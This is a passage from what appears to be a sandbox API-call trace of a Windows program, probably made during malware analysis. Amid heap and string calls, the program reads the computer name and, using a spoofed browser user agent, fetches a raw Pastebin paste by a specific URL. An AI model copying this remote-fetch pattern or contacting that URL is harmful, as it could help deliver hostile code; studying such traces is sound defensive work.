cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.173] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.175] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.177] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.179] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.180] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.182] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.183] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.184] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.186] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.189] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.191] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.193] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.194] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.196] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.199] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.201] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.204] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.205] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.207] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.209] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.211] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.212] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.215] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.217] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.218] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.220] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.225] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.226] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.228] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.229] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.230] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.232] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.233] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.235] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.237] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.238] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.239] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.241] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.242] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.244] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.245] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.246] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.248] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.251] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.252] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.254] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.256] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.258] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.259] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.261] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.263] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.264] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.266] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.267] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.269] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.271] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.272] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.274] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.275] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.279] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.280] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.282] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.284] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.285] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.287] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.288] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.290] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.292] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.293] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.295] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.297] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.298] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.300] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.301] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.303] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.304] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.306] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.306] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0252.537] GetComputerNameW (in: lpBuffer=0x87f190, nSize=0x87f4ac | out: lpBuffer="XDUWTFONO", nSize=0x87f4ac) returned 1 [0252.538] CoInitialize (pvReserved=0x0) returned 0x1 [0252.538] CoUninitialize () [0252.538] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x3c) returned 0xc9b120 [0252.538] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0xc9b138 | out: lpclsid=0xc9b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0252.543] CoCreateInstance (in: rclsid=0xc9b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0xc9b148*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x87f458 | out: ppv=0x87f458*=0xca3298) returned 0x0 [0252.553] WinHttpRequest:IUnknown:QueryInterface (in: This=0xca3298, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x87f428 | out: ppvObject=0x87f428*=0x0) returned 0x80004002 [0252.553] WinHttpRequest:IUnknown:QueryInterface (in: This=0xca3298, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x87f428 | out: ppvObject=0x87f428*=0x0) returned 0x80004002 [0252.553] WinHttpRequest:IUnknown:QueryInterface (in: This=0xca3298, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc9b128 | out: ppvObject=0xc9b128*=0xca3298) returned 0x0 [0252.553] WinHttpRequest:IUnknown:Release (This=0xca3298) returned 0x1 [0252.553] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f28 [0252.553] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f40 [0252.553] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f40 | out: hHeap=0xc60000) returned 1 [0252.553] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0252.554] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a600 | out: hHeap=0xc60000) returned 1 [0252.554] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e258 | out: hHeap=0xc60000) returned 1 [0252.554] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b58 | out: hHeap=0xc60000) returned 1 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e258 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a600 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b58 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f40 [0252.554] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f28 | out: hHeap=0xc60000) returned 1 [0252.554] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b78 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f28 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19c8 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f58 [0252.554] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19b8 [0252.554] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e488 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd79f70 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f88 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd79fa0 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd79fb8 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79fd0 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd79fe8 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a000 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a018 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a030 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a048 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19a8 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a060 [0252.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4b0 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a078 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19a8 [0252.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a060 | out: hHeap=0xc60000) returned 1 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1998 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4d8 [0252.555] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0252.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4d8 | out: hHeap=0xc60000) returned 1 [0252.555] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1998 | out: hHeap=0xc60000) returned 1 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a060 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9b318 [0252.555] PeekMessageW (in: lpMsg=0x87ef6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef6c) returned 0 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4d8 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0a8 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1998 [0252.555] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0c0 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1998 | out: hHeap=0xc60000) returned 1 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0d8 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0a8 | out: hHeap=0xc60000) returned 1 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4d8 | out: hHeap=0xc60000) returned 1 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc733f0 | out: hHeap=0xc60000) returned 1 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc850e0 | out: hHeap=0xc60000) returned 1 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0d8 | out: hHeap=0xc60000) returned 1 [0252.556] PeekMessageW (in: lpMsg=0x87ef6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef6c) returned 0 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xc850e0 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0d8 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc850e0 | out: hHeap=0xc60000) returned 1 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4d8 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0a8 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850e0 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0c0 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0252.556] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0d8 | out: hHeap=0xc60000) returned 1 [0252.556] PeekMessageW (in: lpMsg=0x87ef6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef6c) returned 0 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1998 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e500 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0d8 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19d8 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e528 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a108 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19e8 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a120 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19f8 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xccd3d8 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a138 [0252.556] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a08 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xce3938 [0252.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a138 | out: hHeap=0xc60000) returned 1 [0252.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xccd3d8 | out: hHeap=0xc60000) returned 1 [0252.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19f8 | out: hHeap=0xc60000) returned 1 [0252.557] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19e8 | out: hHeap=0xc60000) returned 1 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xce39e8 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19e8 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a138 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19f8 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a150 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a18 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a168 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a28 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a180 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a38 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a198 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a48 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a1b0 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a58 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a1c8 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a68 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a1e0 [0252.557] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a78 [0252.557] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x87e8b8 | out: lpUrlComponents=0x87e8b8) returned 1 [0252.627] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a168 | out: hHeap=0xc60000) returned 1 [0252.627] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9f1f8 [0252.627] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a1b0 | out: hHeap=0xc60000) returned 1 [0252.627] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9f248 [0252.627] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a1c8 | out: hHeap=0xc60000) returned 1 [0252.627] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9f270 [0252.627] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xc9c480 [0252.627] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1c68 [0252.627] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a1e0 | out: hHeap=0xc60000) returned 1 [0252.627] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xca9288 [0252.627] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9c480 | out: hHeap=0xc60000) returned 1 [0252.627] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1c68 | out: hHeap=0xc60000) returned 1 [0252.627] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0252.628] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x87e900, dwBufferLength=0x8) returned 1 [0252.628] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x87e90c | out: lpBuffer=0x0, lpdwBufferLength=0x87e90c) returned 0 [0252.721] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a948 [0252.721] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0xd7a948, lpdwBufferLength=0x87e90c | out: lpBuffer=0xd7a948, lpdwBufferLength=0x87e90c) returned 1 [0252.721] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a948 | out: hHeap=0xc60000) returned 1 [0252.722] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0252.722] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0252.723] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0254.451] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x87e8c0, lpdwBufferLength=0x87e8b8, lpdwIndex=0x87e8bc*=0x0 | out: lpBuffer=0x87e8c0*, lpdwBufferLength=0x87e8b8*=0x4, lpdwIndex=0x87e8bc*=0x0) returned 1 [0254.451] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x87e8dc, lpdwBufferLength=0x87e908, lpdwIndex=0x87e90c*=0x0 | out: lpBuffer=0x87e8dc, lpdwBufferLength=0x87e908, lpdwIndex=0x87e90c*=0x0) returned 0 [0254.451] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x87e840 | out: lpCharType=0x87e840) returned 1 [0254.451] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x87e8bc, dwFlags=0x0, dwContext=0x0) returned 1 [0254.451] RtlAllocateHeap 